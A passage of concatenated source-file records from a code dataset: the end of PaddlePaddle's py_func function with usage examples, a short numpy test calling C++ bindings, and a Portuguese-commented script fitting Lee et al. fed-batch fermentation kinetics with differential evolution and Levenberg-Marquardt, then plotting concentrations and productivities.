return np.array(dy) * (1 - np.square(np.array(y)))
# Creates a forward function for debugging running networks(print value)
def debug_func(x):
print(x)
def create_tmp_var(name, dtype, shape):
return paddle.static.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def simple_net(img, label):
hidden = img
for idx in range(4):
hidden = paddle.static.nn.fc(hidden, size=200)
new_hidden = create_tmp_var(name='hidden_{}'.format(idx),
dtype=hidden.dtype, shape=hidden.shape)
# User-defined forward and backward
hidden = paddle.static.py_func(func=tanh, x=hidden,
out=new_hidden, backward_func=tanh_grad,
skip_vars_in_backward_input=hidden)
# User-defined debug functions that print out the input Tensor
paddle.static.py_func(func=debug_func, x=hidden, out=None)
prediction = paddle.static.nn.fc(hidden, size=10, activation='softmax')
ce_loss = paddle.nn.loss.CrossEntropyLoss()
return ce_loss(prediction, label)
x = paddle.static.data(name='x', shape=[1,4], dtype='float32')
y = paddle.static.data(name='y', shape=[1], dtype='int64')
res = simple_net(x, y)
exe = paddle.static.Executor(paddle.CPUPlace())
exe.run(paddle.static.default_startup_program())
input1 = np.random.random(size=[1,4]).astype('float32')
input2 = np.random.randint(1, 10, size=[1], dtype='int64')
out = exe.run(paddle.static.default_main_program(),
feed={'x':input1, 'y':input2},
fetch_list=[res.name])
print(out)
.. code-block:: python
# example 2:
# This example shows how to turn Tensor into numpy array and
# use numpy API to register an Python OP
import paddle
import numpy as np
paddle.enable_static()
def element_wise_add(x, y):
# Tensor must be actively converted to numpy array, otherwise,
# numpy.shape can't be used.
x = np.array(x)
y = np.array(y)
if x.shape != y.shape:
raise AssertionError("the shape of inputs must be the same!")
result = np.zeros(x.shape, dtype='int32')
for i in range(len(x)):
for j in range(len(x[0])):
result[i][j] = x[i][j] + y[i][j]
return result
def create_tmp_var(name, dtype, shape):
return paddle.static.default_main_program().current_block().create_var(
name=name, dtype=dtype, shape=shape)
def py_func_demo():
start_program = paddle.static.default_startup_program()
main_program = paddle.static.default_main_program()
# Input of the forward function
x = paddle.static.data(name='x', shape=[2,3], dtype='int32')
y = paddle.static.data(name='y', shape=[2,3], dtype='int32')
# Output of the forward function, name/dtype/shape must be specified
output = create_tmp_var('output','int32', [3,1])
# Multiple Tensor should be passed in the form of tuple(Tensor) or list[Tensor]
paddle.static.py_func(func=element_wise_add, x=[x,y], out=output)
exe=paddle.static.Executor(paddle.CPUPlace())
exe.run(start_program)
# Feed numpy array to main_program
input1 = np.random.randint(1, 10, size=[2,3], dtype='int32')
input2 = np.random.randint(1, 10, size=[2,3], dtype='int32')
out = exe.run(main_program,
feed={'x':input1, 'y':input2},
fetch_list=[output.name])
print("{0} + {1} = {2}".format(input1, input2, out))
py_func_demo()
# Reference output:
# [[5, 9, 9] + [[7, 8, 4] = [array([[12, 17, 13]
# [7, 5, 2]] [1, 3, 3]] [8, 8, 5]], dtype=int32)]
"""
helper = LayerHelper('py_func', **locals())
check_type(x, 'X', (list, tuple, Variable, type(None)), 'py_func')
if x is None:
x = []
elif isinstance(x, Variable):
x = [x]
elif isinstance(x, tuple):
x = list(x)
elif not isinstance(x, (list, tuple, Variable)):
raise TypeError('Input must be Tensor/list(Tensor)/tuple(Tensor)')
check_type(out, 'Out', (list, tuple, Variable, type(None)), 'py_func')
if out is None:
out_list = []
elif isinstance(out, Variable):
out_list = [out]
elif isinstance(out, tuple):
out_list = list(out)
elif isinstance(out, list):
out_list = out
else:
raise TypeError('Output must be Tensor/list(Tensor)/tuple(Tensor)')
fwd_func_id = PyFuncRegistry(func).id
bwd_func_id = (
PyFuncRegistry(backward_func).id if backward_func is not None else -1
)
for each_out in out_list:
if len(each_out.shape) == 0:
raise ValueError(
'Output shapes of py_func should be provided by users manually'
)
backward_skip_vars = set()
if backward_func is not None and skip_vars_in_backward_input is not None:
if isinstance(skip_vars_in_backward_input, Variable):
skip_vars_in_backward_input = [skip_vars_in_backward_input]
fwd_in_out = [v.name for v in x]
fwd_in_out.extend([v.name for v in out_list])
fwd_in_out = set(fwd_in_out)
backward_skip_vars = set()
for v in skip_vars_in_backward_input:
if v.name not in fwd_in_out:
raise ValueError(
'Tensor {} is not found in forward inputs and outputs'.format(
v.name
)
)
backward_skip_vars.add(v.name)
helper.append_op(
type='py_func',
inputs={'X': x},
outputs={'Out': out_list},
attrs={
'forward_callable_id': fwd_func_id,
'backward_callable_id': bwd_func_id,
'backward_skip_vars': list(backward_skip_vars),
},
)
return out
# For debug usage
py_func.registered_func = PyFuncRegistry.registered_func
py_func.registered_func_num = PyFuncRegistry.registered_func_num
|
[
"noreply@github.com"
] |
chenwhql.noreply@github.com
|
80446453507804feccaab2b1c877c8202883ba81
|
20daf183a06760a61dfb0e0269050659f7fc21e5
|
/cmake_笔记/cmake_生成动态链接库/pytest.py
|
f0081263703b13e6212a9982ec1601bc92355dd2
|
[] |
no_license
|
qiuzhuangshandian/SmallTools
|
d2205b1c9eed9943a14ac9cb18a6d63d1d65f24a
|
026eedcf2b3d1d32753892ea49993a854870d1c2
|
refs/heads/master
| 2022-02-14T10:34:19.284676
| 2021-12-29T08:23:33
| 2021-12-29T08:23:33
| 129,028,808
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
from pyfunc import sayhello,testfunc,convfunc
import numpy as np
X= [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
K = [[1, 1], [1, 1]]
X_np = np.array(X).astype(np.int32) #注意参数类型要和c++函数里的参数类型一致
K_np = np.array(K).astype(np.int32)
result = np.zeros(shape=[4,4]).astype(np.int32)
sayhello()
testfunc(X_np,3)
convfunc(X_np,K_np,result,2,2,3,3)
|
[
"noreply@github.com"
] |
qiuzhuangshandian.noreply@github.com
|
1f8c7106b72a53e8bdc19e6d5d0048f0f20df93a
|
66167c31e42dd2c642557c6b58e599a84d504229
|
/Batelada_Alimentada/Modelagem/Alimentacao_Taxa_Constante/Inibicao_pela_Biomassa/Modelag_ag_alm_bat_alim_vaz_const_Lee_et_al_corrigido.py
|
377375a5b688f7f0e1fa39a210213314d00ee02b
|
[] |
no_license
|
BrunaAQ/Projeto_Iniciacao_Cientifica_FAPESP
|
ab26a299fd7718f53b405bf73e962094679694d5
|
6a9131ad90ce095c8863c76370b6238f9585ec95
|
refs/heads/master
| 2023-03-17T19:22:09.925701
| 2021-03-09T18:15:27
| 2021-03-09T18:15:27
| 276,701,946
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,341
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 12 17:02:12 2020
@author: Bruna Aparecida
"""
## MODELAGEM BATELADA ALIMENTADA À VAZÃO CONSTANTE CINÉTICA DE LEE ET AL ##
# Importação das bibliotecas necessárias para as partes não modulares:
import Modulos_Lee_et_al_bat_alim
import Modulo_peso_limite_AG
from scipy.integrate import odeint
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import differential_evolution
from scipy.optimize import leastsq
import scipy.stats as sc
import pandas as pd
import time
## Separação do processo em batelada (etapa 1) e batelada alimentada (etapa 2):
# PRIMEIRO PASSO: simulação de dados para Cx, Cs e Cp:
#*ETAPA 1*# - BATELADA
## Módulos:
### Valores dos parâmetros do modelo e condição inicial:
dad_entr_geral = Modulos_Lee_et_al_bat_alim.entr_Lee_et_al()
## Valor de entrada dos parâmetros cinéticos
pars_entr = dad_entr_geral[0]
mimaximo = pars_entr[0]
Ks = pars_entr[1]
Yxs = pars_entr[7]
alfa = pars_entr[8]
beta = pars_entr[9]
m = pars_entr[10]
Cx_estr = pars_entr[11]
## Integração numérica (sistema de EDOs):
def bat_Lee_et_al(Concent,t_exp_bat):
Cx,Cs,Cp = Concent
mi = mimaximo*((Cs/(Ks+Cs))*((abs(1-(Cx/Cx_estr)))**m))
dCxdt = mi*Cx
dCsdt = (-1/Yxs)*mi*Cx
dCpdt = alfa*mi*Cx+beta*Cx
return(dCxdt,dCsdt,dCpdt)
### Condições de integração:
cond_inic_bat = dad_entr_geral[1]
t_exp_bat = dad_entr_geral[2]
### Matriz de retorno:
C_exp_bat = odeint(bat_Lee_et_al, cond_inic_bat, t_exp_bat)
#*ETAPA 2*# - BATELADA ALIMENTADA
## Módulos:
### Valores dos parâmetros operacionais e condição inicial:
param_oper_alim = dad_entr_geral[3]
Cs0_corrent_alim = param_oper_alim[0]
V0 = param_oper_alim[2]
Vf = param_oper_alim[3]
Q = param_oper_alim[4]
## Integração numérica (sistema de EDOs):
def bat_alim_Lee_et_al(Concent,t_exp_alim):
Cx,Cs,Cp = Concent
mi = mimaximo*((Cs/(Ks+Cs))*((abs(1-(Cx/Cx_estr)))**m))
D = Q/(V0+Q*t_exp_alim)
dCxdt = (mi-D)*Cx
dCsdt = D*(Cs0_corrent_alim-Cs)-((mi*Cx)/Yxs)
dCpdt = D*(Cp0_alim-Cp)+Cx*(beta+alfa*mi)
return(dCxdt,dCsdt,dCpdt)
### Condições de integração:
#### Condição inicial - Valores finais da batelada vão ser os iniciais da batelada alimentada:
Cx0_alim = C_exp_bat[:,0][len(C_exp_bat[:,0])-1]
Cs0_alim = C_exp_bat[:,1][len(C_exp_bat[:,1])-1]
Cp0_alim = C_exp_bat[:,2][len(C_exp_bat[:,2])-1]
cond_inic_alim = [Cx0_alim, Cs0_alim, Cp0_alim]
t_exp_alim = dad_entr_geral[4]
### Matriz de retorno:
C_exp_alim = odeint(bat_alim_Lee_et_al, cond_inic_alim, t_exp_alim)
# SEGUNDO PASSO: aplicar a modelagem por acoplamento AG-ALM:
# Início da contagem do tempo de convergência computacional:
start_tempo = time.time()
#*ETAPA 1*# - BATELADA
##*Algoritmo Genético (global)*##
# Módulos
## Função com as equações modelo com os parâmetros atribuídos a argumentos:
func_args_bat = Modulos_Lee_et_al_bat_alim.modelag_bat_Lee_et_al_func_args()
## Atribuição de pesos a Cx, Cs e Cp para a modelagem (tendência de convergência - ideia de prioridade):
dpC = Modulo_peso_limite_AG.peso()
## Função objetiva, compara os pontos experimentais com o sistema cinético adotado:
def func_obj_ag_bat(parametros, *dados):
t_exp,C_exp = dados
p = tuple(parametros)
C_sim = odeint(func_args_bat, cond_inic_bat, t_exp_bat, args = p)
res = C_sim - C_exp
for i in range(0,3):
res[:,i] = res[:,i]/dpC[i]
res = res.flatten()
res = sum(res**2)
return res
## Importação dos bounds para aplicação do AG:
limites_Lee_et_al = Modulo_peso_limite_AG.limites()[8]
# Definição dos argumentos:
args = (t_exp_bat,C_exp_bat)
resultado_ag_bat = differential_evolution(func_obj_ag_bat, limites_Lee_et_al, args=args, popsize=5, tol=0.01, mutation=(0.5, 1), recombination=0.7, updating='immediate')
resultado_ag_bat = resultado_ag_bat.x
resultado_ag_bat = tuple(resultado_ag_bat)
##*Algoritmo de Levenberg-Marquardt (local)*##
## Função objetiva para o ALM:
def func_obj_alm_bat(p):
p = tuple(p)
C_sim_bat = odeint(func_args_bat,cond_inic_bat,t_exp_bat,args=p)
res = C_sim_bat - C_exp_bat
for i in range(0,3):
res[:,i]=res[:,i]/dpC[i]
return res.flatten()
## Minimização da função objetiva pela função leastsq:
lance_inic_bat = [resultado_ag_bat]
resultado_alm_bat = leastsq(func_obj_alm_bat,lance_inic_bat, args=(), Dfun=None, full_output=1)
param_otim_alm_bat = resultado_alm_bat[0]
'''
## Cálculo do intervalo de confiança (I.C.) correspondente:
res_otimo_bat = resultado_alm_bat[2]['fvec']
sensT_otimo_bat =resultado_alm_bat[2]['fjac']
npar_bat = len(sensT_otimo_bat[:,1])
ndata_bat = len(sensT_otimo_bat[1,:])
invXtX_bat = np.linalg.inv(np.matmul(sensT_otimo_bat,sensT_otimo_bat.transpose()))
sig2y_bat = sum(res_otimo_bat**2) / (ndata_bat-npar_bat)
covparamers_bat = invXtX_bat*sig2y_bat
EPpar_bat = np.sqrt(covparamers_bat.diagonal())
ICpar_bat = EPpar_bat*sc.t.interval(.95, ndata_bat-npar_bat, loc=0, scale=1)[1]
'''
## Armazenamento dos parâmetros otimizados em tuplas:
param_otim_alm_bat = tuple(param_otim_alm_bat)
## Tempo modelo:
t_bat = np.arange(0, t_exp_bat[-1], 0.1)
## Integrando com os valores dos parâmetros ajustados:
C_otim_bat = odeint(func_args_bat, cond_inic_bat, t_bat, args = (param_otim_alm_bat))
#*ETAPA 2*# - BATELADA ALIMENTADA
##*Algoritmo Genético (global)*##
# Função com as equações modelo com os parâmetros atribuídos a argumentos:
def func_args_alim(C, t_exp_alim, *args):
mimaximo = args[0]
Ks = args[1]
Yxs = args[2]
alfa = args[3]
beta = args[4]
m = args[5]
Cx_estr = args[6]
mi = mimaximo*((C[1]/(Ks+C[1]))*((abs(1-(C[0]/Cx_estr)))**m))
D = Q/(V0 + Q*t_exp_alim)
dCxdt = (mi - D)*C[0]
dCsdt = D*(Cs0_corrent_alim - C[1]) - ((mi*C[0])/Yxs)
dCpdt = D*(Cp0_alim - C[2]) + C[0]*(beta + alfa*mi)
return(dCxdt,dCsdt,dCpdt)
# Módulos
## Função objetiva, compara os pontos experimentais com o sistema cinético adotado:
def func_obj_ag_alim(parametros, *dados):
t_exp_alim,C_exp_alim = dados
p = tuple(parametros)
C_sim_alim = odeint(func_args_alim, cond_inic_alim, t_exp_alim, args = p)
res = C_sim_alim - C_exp_alim
for i in range(0,3):
res[:,i] = res[:,i]/dpC[i]
res = res.flatten()
res = sum(res**2)
return res
# Definição dos argumentos:
args = (t_exp_alim,C_exp_alim)
resultado_ag_alim = differential_evolution(func_obj_ag_alim, limites_Lee_et_al, args = args, popsize=5, tol=0.01, mutation=(0.5, 1), recombination=0.7, updating='immediate')
resultado_ag_alim = resultado_ag_alim.x
resultado_ag_alim = tuple(resultado_ag_alim)
##*Algoritmo de Levenberg-Marquardt (local)*##
## Função objetiva para o ALM:
def func_obj_alm_alim(p):
p = tuple(p)
C_sim_alim = odeint(func_args_alim,cond_inic_alim,t_exp_alim,args=p)
res = C_sim_alim - C_exp_alim
for i in range(0,3):
res[:,i]=res[:,i]/dpC[i]
return res.flatten()
## Minimização da função objetiva pela função leastsq:
lance_inic_alim= [resultado_ag_alim]
resultado_alm_alim = leastsq(func_obj_alm_alim,lance_inic_alim, args=(), Dfun=None, full_output=1)
param_otim_alm_alim = resultado_alm_alim[0]
'''
## Cálculo do intervalo de confiança (I.C.) correspondente:
res_otimo_alim = resultado_alm_alim[2]['fvec']
sensT_otimo_alim =resultado_alm_alim[2]['fjac']
npar_alim = len(sensT_otimo_alim[:,1])
ndata_alim = len(sensT_otimo_alim[1,:])
invXtX_alim = np.linalg.inv(np.matmul(sensT_otimo_alim,sensT_otimo_alim.transpose()))
sig2y_alim = sum(res_otimo_alim**2) / (ndata_alim-npar_alim)
covparamers_alim = invXtX_alim*sig2y_alim
EPpar_alim = np.sqrt(covparamers_alim.diagonal())
ICpar_alim = EPpar_alim*sc.t.interval(.95, ndata_alim-npar_alim, loc=0, scale=1)[1]
'''
## Armazenamento dos parâmetros otimizados em tuplas:
param_otim_alm_alim = tuple(param_otim_alm_alim)
## Tempo modelo:
t_alim = np.arange(dad_entr_geral[0][6], t_exp_alim[-1], 0.1)
## Integrando com os valores dos parâmetros ajustados:
Cx0_otim_alim = C_otim_bat[:,0][len(C_otim_bat[:,0])-1]
Cs0_otim_alim = C_otim_bat[:,1][len(C_otim_bat[:,1])-1]
Cp0_otim_alim = C_otim_bat[:,2][len(C_otim_bat[:,2])-1]
cond_inic_alim = [Cx0_otim_alim, Cs0_otim_alim, Cp0_otim_alim]
C_otim_alim = odeint(func_args_alim, cond_inic_alim, t_alim, args = (param_otim_alm_alim))
## Parada da contagem do tempo de convergência total:
fim = time.time()
tempo_converg = fim - start_tempo
###***Impressão valores de saída***###
print("____________Saída Geral____________")
# Tempo de convergência requerido:
print("Tempo de modelagem:", tempo_converg, "s")
#*ETAPA 1*#
print("____________Resultados para batelada____________")
print("mimaxixo_bat:",resultado_alm_bat[0][0])#,"+/-",ICpar_bat[0],"(h-1)")
print("Ks_bat:",resultado_alm_bat[0][1])#,"+/-",ICpar_bat[1],"(g/l)")
print("Yxs_bat:",resultado_alm_bat[0][2])#,"+/-",ICpar_bat[2],"(gx/gs)")
print("alfa_bat:",resultado_alm_bat[0][3])#,"+/-",ICpar_bat[3],"(gp/gx)")
print("beta_bat:",resultado_alm_bat[0][4])#,"+/-",ICpar_bat[4],"[gp/(gx.h)]")
print("m_bat:",resultado_alm_bat[0][5])#,"+/-",ICpar_bat[5],"[adimensional]")
print("Cx_estr_bat:",resultado_alm_bat[0][6])#,"+/-",ICpar_bat[5],"[gx/l]")
#*ETAPA 2*#
print("____________Resultados para batelada alimentada____________")
print("mimaxixo_alim:",resultado_alm_alim[0][0])#,"+/-",ICpar_alim[0],"(h-1)")
print("Ks_alim:",resultado_alm_alim[0][1])#,"+/-",ICpar_alim[1],"(g/l)")
print("Yxs_alim:",resultado_alm_alim[0][2])#,"+/-",ICpar_alim[2],"(gx/gs)")
print("alfa_alim:",resultado_alm_alim[0][3])#,"+/-",ICpar_alim[0],"(gp/gx)")
print("beta_alim:",resultado_alm_alim[0][4])#,"+/-",ICpar_alim[0],"[gp/(gx.h)]")
print("m_alim:",resultado_alm_alim[0][5])#"+/-",ICpar_bat[0],"[adimensional]")
print("Cx_estr_bat:",resultado_alm_bat[0][6])#,"+/-",ICpar_bat[5],"[gx/l]")
###***Impressão gráfica***###
## União das matrizes C_exp_bat e C_exp_alim:
#*ETAPA 1*# - BATELADA
Cx_exp_bat = C_exp_bat[:,0]
Cx_bat = C_otim_bat[:,0]
Cs_exp_bat = C_exp_bat[:,1]
Cs_bat = C_otim_bat[:,1]
Cp_exp_bat = C_exp_bat[:,2]
Cp_bat = C_otim_bat[:,2]
#*ETAPA 2*# - BATELADA ALIMENTADA
Cx_exp_alim = C_exp_alim[:,0]
Cx_alim = C_otim_alim[:,0]
Cs_exp_alim = C_exp_alim[:,1]
Cs_alim = C_otim_alim[:,1]
Cp_exp_alim = C_exp_alim[:,2]
Cp_alim = C_otim_alim[:,2]
### Contadores gerais:
#*ETAPA 1*# - BATELADA
limite_bat_exp = len(C_exp_bat)
limite_alim_exp = len(C_exp_alim)
limite_bat = len(C_otim_bat)
limite_alim = len(C_otim_alim)
Cx_exp = []
Cs_exp = []
Cp_exp = []
Cx = []
Cs = []
Cp = []
bat_exp = 0
alim_exp = 0
bat = 0
alim = 0
while (bat_exp < limite_bat_exp):
Cx_exp.append(Cx_exp_bat[bat_exp])
Cs_exp.append(Cs_exp_bat[bat_exp])
Cp_exp.append(Cp_exp_bat[bat_exp])
bat_exp = bat_exp + 1
while (bat < limite_bat):
Cx.append(Cx_bat[bat])
Cs.append(Cs_bat[bat])
Cp.append(Cp_bat[bat])
bat = bat + 1
while (alim_exp < limite_alim_exp):
Cx_exp.append(Cx_exp_alim[alim_exp])
Cs_exp.append(Cs_exp_alim[alim_exp])
Cp_exp.append(Cp_exp_alim[alim_exp])
alim_exp = alim_exp + 1
while (alim < limite_alim):
Cx.append(Cx_alim[alim])
Cs.append(Cs_alim[alim])
Cp.append(Cp_alim[alim])
alim = alim + 1
divisor = len(Cx)
## Vetor tempo total do processo:
Ttotal_exp = np.arange(0,param_oper_alim[1],0.5)
divisor = len(Cx)
Ttotal = np.linspace (0,param_oper_alim[1],divisor)
## Conversão das listas para arrays - necessário para operações matemáticas:
Cx_exp = np.asarray(Cx_exp)
Cs_exp = np.asarray(Cs_exp)
Cp_exp = np.asarray(Cp_exp)
Cx = np.asarray(Cx)
Cs = np.asarray(Cs)
Cp = np.asarray(Cp)
## Exportação dos dados em dataframes:
df_concents = pd.DataFrame({'Tempo(h)': Ttotal_exp, 'Cx_exp(g/L)': Cx_exp, 'Cs_exp(g/L)': Cs_exp, 'Cp_exp(g/L)': Cp_exp})
df_params = pd.DataFrame({'mimáx_sim(h-¹)': [pars_entr[0]],'KSX_sim(gp/gs)': [pars_entr[1]],
'Yxs_sim(gcél/gsubs)': [pars_entr[7]],
'alfa(gprod/gcél)': [pars_entr[8]], 'beta_sim(gprod/gcél.h)': [pars_entr[9]], "m(-)": [pars_entr[10]], "Cx_estr(g/l)": [pars_entr[11]],
"Q(L.h)": [param_oper_alim[4]], "V0(L)": [param_oper_alim[2]], "tf_batelada(h)": [pars_entr[6]],
"Cs0_alim(gs/L)": [param_oper_alim[0]]})
df_saida_lee = pd.concat([df_concents, df_params], axis=1)
with pd.ExcelWriter('Sim_Lee_et_al_alim_const.xlsx') as writer:
df_saida_lee.to_excel(writer, sheet_name="Saída_Lee_et_al_alim_const")
writer.save()
def tam_graf():
# Gráfico batelada e batelada alimentada
SMALL_SIZE = 20
MEDIUM_SIZE = 24
## Comando para determinar o tamanho segundo o qual os textos grafados no gráfico serão impressos na tela:
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=SMALL_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=SMALL_SIZE)
# Gráfico perfil de concentração:
# Definindo a figura que será gerada - batelada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_bat,C_otim_bat[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_bat,C_exp_bat[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_bat,C_otim_bat[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(t_exp_bat ,C_exp_bat[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_bat,C_otim_bat[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_bat,C_exp_bat[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - batelada alimentada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_alim,C_otim_alim[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_alim,C_exp_alim[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_alim,C_otim_alim[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(t_exp_alim,C_exp_alim[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_alim,C_otim_alim[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_alim,C_exp_alim[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - processos acoplados:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(t_bat,C_otim_bat[:,0], color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(t_exp_bat,C_exp_bat[:,0],'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(t_bat,C_otim_bat[:,1], linestyle="--", color = "green",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(t_exp_bat ,C_exp_bat[:,1],'^',color = "green", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(t_bat,C_otim_bat[:,2],linestyle = ":", color = "blue",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(t_exp_bat,C_exp_bat[:,2],'s',color = "blue", markersize = 6,label = 'Cp experimental')
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1+lns2+lns3+lns4+lns5+lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
# Definindo a figura que será gerada - batelada alimentada:
tam_graf()
_ = f = plt.figure()
_ = ax = f.add_subplot(111)
_ = lns1 = ax.plot(Ttotal,Cx, color = "red", linewidth = 3,label ='Cx modelo')
_ = lns2 = ax.plot(Ttotal_exp,Cx_exp,'o',color = "red",markersize = 6, label = 'Cx experimental')
_ = lns3 = ax.plot(Ttotal,Cs, linestyle=":", color = "blue",linewidth = 3,label = 'Cs modelo')
_ = lns4 = ax.plot(Ttotal_exp,Cs_exp,'s',color = "blue", markersize = 6,label = 'Cs experimental')
ax2 = ax.twinx()
_ = lns5 = ax2.plot(Ttotal,Cp,linestyle = "--", color = "green",linewidth = 3,label = 'Cp modelo')
_ = lns6 = ax2.plot(Ttotal_exp,Cp_exp,'^',color = "green", markersize = 6,label = 'Cp experimental')
_ = ax.axvline(x = dad_entr_geral[0][6], color = "grey", linestyle="dashed", linewidth=3)
_ = ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
_ = ax.set_ylabel('Cx e Cs (g/L)', weight='bold')
_ = ax2.set_ylabel('Cp (g/L)', weight='bold')
lns = lns1 + lns2 + lns3 + lns4 + lns5 + lns6
labs = [l.get_label() for l in lns]
_ = ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=3, fancybox=True, shadow=True)
_ = ax.grid(True)
_ = f.set_figheight(9)
_ = f.set_figwidth(14)
_ = f.patch.set_facecolor('white')
_ = plt.style.use('default')
## Cálculo produtividade volumétrica modelo e experimental - celular e do produto:
Px_exp = Cx_exp[1:]/Ttotal_exp[1:]
Pp_exp = Cp_exp[1:]/Ttotal_exp[1:]
Px = Cx[1:]/Ttotal[1:]
Pp = Cp[1:]/Ttotal[1:]
## Plotando a figura gráfica - produtividades:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
lns1 = ax.plot(Ttotal[1:] ,Px,'red',linewidth=3,label='Produtividade Celular modelo')
lns2 = ax.plot(Ttotal_exp[1:] ,Px_exp,'or',markersize=6, label='Produtividade Celular experimental')
ax2 = ax.twinx()
lns3 = ax2.plot(Ttotal[1:],Pp,linestyle=":", color='blue',linewidth=3,label='Produtividade do Produto modelo')
lns4 = ax2.plot(Ttotal_exp[1:],Pp_exp,'sb', markersize=6,label='Produtividade do Produto experimental')
ax.set_xlabel('Tempo de cultivo (h)',weight='bold')
ax.set_ylabel('Produtividade Celular (gx/L.h)', weight='bold')
ax2.set_ylabel('Produtividade Produto (gp/L.h)', weight='bold')
lns = lns1+lns2+lns3+lns4
labs = [l.get_label() for l in lns]
ax.legend(lns, labs, loc='upper center', bbox_to_anchor=(0.5, 1.19),ncol=2, fancybox=True, shadow=True )
ax.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
#Equação que permite calcular a produtividade específica (Ppx) modelo e experimental:
Ppx_exp = Cp_exp*(1/Cx_exp)
Ppx_exp[Ppx_exp<0] = 0
Ppx = Cp*(1/Cx)
Ppx[Ppx<0] = 0
## Plotando a figura gráfica - produtividade específica:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
plt.plot(Ttotal,Ppx,'red',linewidth=3, label='Modelo')
plt.plot(Ttotal_exp,Ppx_exp,'or',markersize=6, label='Experimental')
plt.xlabel('Tempo de cultivo (h)',weight='bold')
plt.ylabel('Produtividade Específica (gp/gx)', weight='bold')
plt.legend(loc='upper center', bbox_to_anchor=(0.5, 1.17),ncol=2, fancybox=True, shadow=True )
plt.grid(True)
f.set_figheight(9)
f.set_figwidth(14)
f.patch.set_facecolor('white')
plt.style.use('default')
plt.show()
# Calculando a velocidade de crescimento microbiano - experimental e modelada:
#imprimindo os valores dos parâmetros
#param_otim = np.asarray(resultado_alm_alim)
#Calculando os valores de mi - modelo otimizado e experimental
mimaximo_otim = resultado_alm_alim[0][0]
Ks_otim = resultado_alm_alim[0][1]
m_otim = resultado_alm_alim[0][5]
Cx_estr_otim = resultado_alm_alim[0][6]
mi_exp = mimaximo_otim*((Cs_exp/(Ks_otim + Cs_exp))*((1-(Cx_exp/Cx_estr_otim))**m_otim))
mi_exp[mi_exp<0] = 0
mi = mimaximo_otim*((Cs/(Ks_otim + Cs))*((1-(Cx/Cx_estr_otim))**m_otim))
mi[mi<0] = 0
## Plotando a figura gráfica - taxa específica de crescimento microbiano:
tam_graf()
f = plt.figure()
ax = f.add_subplot(111)
plt.plot(Ttotal,mi,'red',linewidth=3, label='Modelo')
